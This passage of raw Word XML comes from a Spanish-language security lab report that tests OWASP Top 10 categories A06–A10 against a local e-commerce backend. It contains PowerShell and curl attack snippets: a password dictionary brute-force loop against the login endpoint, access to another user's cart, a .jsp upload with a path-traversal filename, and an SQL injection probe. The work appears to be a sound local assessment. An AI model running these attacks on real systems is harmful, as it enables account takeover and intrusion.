        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>contenedor.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330BA03F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>10.6 A06 - Insecure Design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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="4A645468" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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F6A0D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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$body = @{ productoId=1; cantidad=999999 } | ConvertTo-Json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/api/carrito/carrito-ajeno/agregar" -Metho</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>d Post -ContentType "application/json" -Body $body</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/api/carrito/carrito-ajeno"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/api/carrito/carrito-ajeno/total"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0606F1E7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537ACF68" w14:textId="06DD5F8D" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado: el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> acepta una cantidad superior a</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>l stock y permite leer o modificar un carrito mediante un identificador elegido por el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A74A49" w14:textId="3AA30658" w:rsidR="001B4825" w:rsidRPr="00742FE9" w:rsidRDefault="001B4825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B4825">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B3722FB" wp14:editId="7B1BFBA6">
            <wp:extent cx="6048375" cy="2557145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2D304" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 9. Carrito con cantidad inválida y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>cartId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> no asociado a un usuario.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución d</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>el laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096405C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.7 A07 - Authentication Failures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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="05CA9118" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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FBF4C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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>$diccionario = @("123456","password","admin","admin123","qwerty123")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>foreach ($pwd in $diccionario) {</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  $body = @{ username="admin"; password=$pwd } | ConvertTo-Json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  try {</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    $r = Invoke-RestMethod "http://127.0.0.1:8080/api/auth/login" -Method Post -ContentType "application/json" -Body $body</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    Write-Host "[OK] Password encontrado: $pwd"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  } catch { W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>rite-Host "[FAIL] $pwd" }</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="472CF376" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2284DEBB" w14:textId="365F50AC" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Resultado esperado: ninguno de los intentos recibe HTTP 429 ni bloqueo temporal y el diccionario encuentra admin123.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6A740" w14:textId="70EAD51B" w:rsidR="001B4825" w:rsidRPr="00742FE9" w:rsidRDefault="001B4825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B4825">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BFE57BA" wp14:editId="137A02ED">
            <wp:extent cx="6048375" cy="2158365"/>
            <wp:effectExtent l="0" t="0" r="952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B4DD9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 10. Intentos consecutivos de autenticación sin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>rate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>limiting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente:</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C639D9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>10.8 A08 - Software or Data Integrity Failures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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="5A24BE6F" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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626A1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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"contenido de prueba" | Out-File .\evidencia.txt -Encoding ascii</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>Copy-Item .\evidencia.txt .\archivo-inocuo.jsp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>curl.exe -X POST "http://127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>.0.0.1:8080/api/productos/1/imagen" -F "archivo=@archivo-inocuo.jsp"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>curl.exe -X POST "http://127.0.0.1:8080/api/productos/1/imagen" -F "archivo=@evidencia.txt;filename=../../evidencia-traversal.txt"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EAAA142" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F94143" w14:textId="2311AC46" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado: el servidor confía en el </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">nombre y extensión controlados por el cliente. La prueba usa contenido inocuo; no se crea ni ejecuta una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780ABDFC" w14:textId="443833AE" w:rsidR="003B4509" w:rsidRPr="00742FE9" w:rsidRDefault="003B4509">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B4509">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B236AFC" wp14:editId="1BE8515D">
            <wp:extent cx="6048375" cy="2818130"/>
            <wp:effectExtent l="0" t="0" r="9525" b="127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4B21F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Figura 11. Carga de archivo con extensión no permitida y nombre controlado.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a par</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>tir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C923C5B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.9 A09 - Security Logging and Alerting Failures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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="5E055243" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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25AE1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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>docker compose logs backend | Select-String -Pattern "password=|Usuario admin semilla"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t># Para observar en tiempo real:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>docker compose logs -f backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D31BD18" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482FF2A6" w14:textId="3D62BE56" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Resultado e</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">sperado: los logs contienen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> de intentos y credenciales semilla. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>existe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alertamiento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>patrón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fuerza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bruta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CCF4C" w14:textId="5C1DE733" w:rsidR="003B4509" w:rsidRDefault="003B4509">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B4509">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="023B877E" wp14:editId="52E0A1AF">
            <wp:extent cx="6048375" cy="2567940"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3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F6EC2" w14:textId="0A2C9ED8" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 12. Credenciales expuestas en los logs del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Fuente: elaboración propia a </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD6856E" w14:textId="77777777" w:rsidR="003B4509" w:rsidRPr="00742FE9" w:rsidRDefault="003B4509">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6908DFD7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>10.10 A10 - Mishandling of Exceptional Conditions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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="153F6515" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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0335E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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>curl.exe -s "http://127.0.0.1:8080/api/productos/%27%20OR%201=1--"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C15987E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2387E6A7" w14:textId="0D1B3107" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
